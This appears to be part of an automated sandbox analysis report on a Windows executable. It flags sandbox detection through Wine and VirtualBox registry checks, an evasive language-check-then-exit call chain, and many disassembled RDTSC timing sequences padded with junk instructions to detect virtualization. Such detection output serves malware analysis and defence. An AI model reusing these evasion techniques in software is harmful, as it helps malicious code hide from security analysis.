                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37646
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4CCD second address: 7C4CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4CD5 second address: 7C4CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F51CD041DF8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4CE6 second address: 7C4CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4CEA second address: 7C4CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3F19 second address: 7C3F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F51CCC6C586h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C3F29 second address: 7C3F5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F51CD041E13h 0x00000012 jmp 00007F51CD041E07h 0x00000017 je 00007F51CD041DF6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C41DF second address: 7C41F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CCC6C58Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C41F2 second address: 7C41F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E66 second address: 7C6E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e je 00007F51CCC6C594h 0x00000014 push eax 0x00000015 push edx 0x00000016 jl 00007F51CCC6C586h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6E8C second address: 7C6EA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CD041E02h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6EA8 second address: 7C6EC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C599h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F33 second address: 7C6F81 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F51CD041E09h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e sub dword ptr [ebp+122D1C09h], eax 0x00000014 push 00000000h 0x00000016 mov di, 2941h 0x0000001a mov dx, 3304h 0x0000001e call 00007F51CD041DF9h 0x00000023 push edi 0x00000024 jc 00007F51CD041DFCh 0x0000002a jnc 00007F51CD041DF6h 0x00000030 pop edi 0x00000031 push eax 0x00000032 push eax 0x00000033 push ebx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F81 second address: 7C6FCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b jmp 00007F51CCC6C595h 0x00000010 push edx 0x00000011 jmp 00007F51CCC6C58Ah 0x00000016 pop edx 0x00000017 popad 0x00000018 mov eax, dword ptr [eax] 0x0000001a push ebx 0x0000001b jmp 00007F51CCC6C58Dh 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop esi 0x0000002a push edx 0x0000002b pop edx 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6FCB second address: 7C704C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dword ptr [ebp+122D1BA2h], eax 0x0000000f push 00000003h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F51CD041DF8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov edx, ecx 0x0000002d mov dword ptr [ebp+122D1815h], esi 0x00000033 push 00000000h 0x00000035 jmp 00007F51CD041E02h 0x0000003a push 00000003h 0x0000003c movzx ecx, si 0x0000003f call 00007F51CD041DF9h 0x00000044 push ecx 0x00000045 jmp 00007F51CD041E09h 0x0000004a pop ecx 0x0000004b push eax 0x0000004c push edi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C704C second address: 7C7050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7050 second address: 7C70B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041DFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F51CD041E06h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 push esi 0x00000017 jng 00007F51CD041DF6h 0x0000001d pop esi 0x0000001e pushad 0x0000001f jl 00007F51CD041DF6h 0x00000025 jmp 00007F51CD041E06h 0x0000002a popad 0x0000002b popad 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 pushad 0x00000036 popad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7183 second address: 7C71EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F51CCC6C594h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F51CCC6C58Ch 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F51CCC6C58Eh 0x0000001c pop eax 0x0000001d mov dword ptr [ebp+122D30B8h], eax 0x00000023 push 00000003h 0x00000025 mov edx, 18C277F2h 0x0000002a push 00000000h 0x0000002c mov dword ptr [ebp+122D1AA2h], ebx 0x00000032 push 00000003h 0x00000034 mov esi, ecx 0x00000036 push BE05EFC6h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F51CCC6C58Ah 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C71EB second address: 7C71F5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F51CD041DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C72B9 second address: 7C72C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C72C0 second address: 7C733B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnc 00007F51CD041DFEh 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D5614h], ecx 0x00000015 push 00000000h 0x00000017 sbb esi, 4151B13Ah 0x0000001d push 0015D531h 0x00000022 jbe 00007F51CD041DFEh 0x00000028 xor dword ptr [esp], 0015D5B1h 0x0000002f push 00000003h 0x00000031 mov dword ptr [ebp+122D2E8Ah], edx 0x00000037 push 00000000h 0x00000039 mov esi, dword ptr [ebp+122D36ECh] 0x0000003f push 00000003h 0x00000041 mov di, si 0x00000044 push 6D9872CDh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jmp 00007F51CD041E08h 0x00000051 jbe 00007F51CD041DF6h 0x00000057 popad 0x00000058 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D8A44 second address: 7D8A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6937 second address: 7E693C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E693C second address: 7E6948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F51CCC6C586h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6D7D second address: 7E6D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F51CD041DF6h 0x0000000a jmp 00007F51CD041DFDh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6D96 second address: 7E6DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F51CCC6C590h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6DAF second address: 7E6DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6DB3 second address: 7E6DB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6F0E second address: 7E6F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F51CD041DF6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6F18 second address: 7E6F34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C598h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7273 second address: 7E7279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7279 second address: 7E727D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7404 second address: 7E741C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F51CD041DFEh 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E741C second address: 7E7420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7420 second address: 7E7436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F51CD041DFCh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7436 second address: 7E743C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E743C second address: 7E7440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7440 second address: 7E744E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E744E second address: 7E7452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E75BA second address: 7E75C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E786D second address: 7E7873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E7873 second address: 7E787F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E79EB second address: 7E79F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E79F3 second address: 7E79F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE917 second address: 7DE926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F51CD041DF6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DE926 second address: 7DE935 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C58Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB50D second address: 7BB511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E86CC second address: 7E86FE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F51CCC6C58Ah 0x00000008 jo 00007F51CCC6C59Dh 0x0000000e jmp 00007F51CCC6C595h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EB587 second address: 7EB58D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBAAA second address: 7EBAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C592h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EAC2B second address: 7EAC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EBE4C second address: 7EBE50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7ECB second address: 7B7ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2EB9 second address: 7F2ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F51CCC6C58Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2ECC second address: 7F2ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEA8A second address: 7BEAA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F51CCC6C588h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2387 second address: 7F23A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFCh 0x00000009 pop edi 0x0000000a push ebx 0x0000000b jno 00007F51CD041DF6h 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F23A0 second address: 7F23CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F51CCC6C58Eh 0x0000000e pushad 0x0000000f js 00007F51CCC6C586h 0x00000015 jmp 00007F51CCC6C58Fh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F23CF second address: 7F23D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F27E4 second address: 7F27EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F27EA second address: 7F27FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F51CD041DFBh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F2A86 second address: 7F2A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F610C second address: 7F6112 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6112 second address: 7F611C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F51CCC6C586h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F62F2 second address: 7F62F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6901 second address: 7F6905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F71B1 second address: 7F71B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F7264 second address: 7F7279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F51CCC6C591h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8149 second address: 7F814D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F8B58 second address: 7F8B66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F51CCC6C586h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9EC4 second address: 7F9ECA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9ECA second address: 7F9ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F9ED0 second address: 7F9ED4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FA9AB second address: 7FA9AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBF9C second address: 7FBFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FEFEF second address: 7FF01A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F51CCC6C597h 0x0000000f jl 00007F51CCC6C586h 0x00000015 popad 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB1AA second address: 7FB1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FBC75 second address: 7FBC79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FB1B0 second address: 7FB1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF554 second address: 7FF5AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007F51CCC6C586h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 xor di, 6DE4h 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov ecx, 13A1A475h 0x0000001e mov dword ptr [ebp+122D1D75h], ecx 0x00000024 popad 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007F51CCC6C588h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 mov bh, D5h 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 je 00007F51CCC6C588h 0x0000004c push esi 0x0000004d pop esi 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2A9 second address: 7FD2AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2AF second address: 7FD2BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2BE second address: 7FD2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801623 second address: 801627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2C2 second address: 7FD2DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CD041E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 801627 second address: 801642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F51CCC6C597h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD2DF second address: 7FD2F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F51CD041E05h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FF78C second address: 7FF792 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803A68 second address: 803A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803A6C second address: 803A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
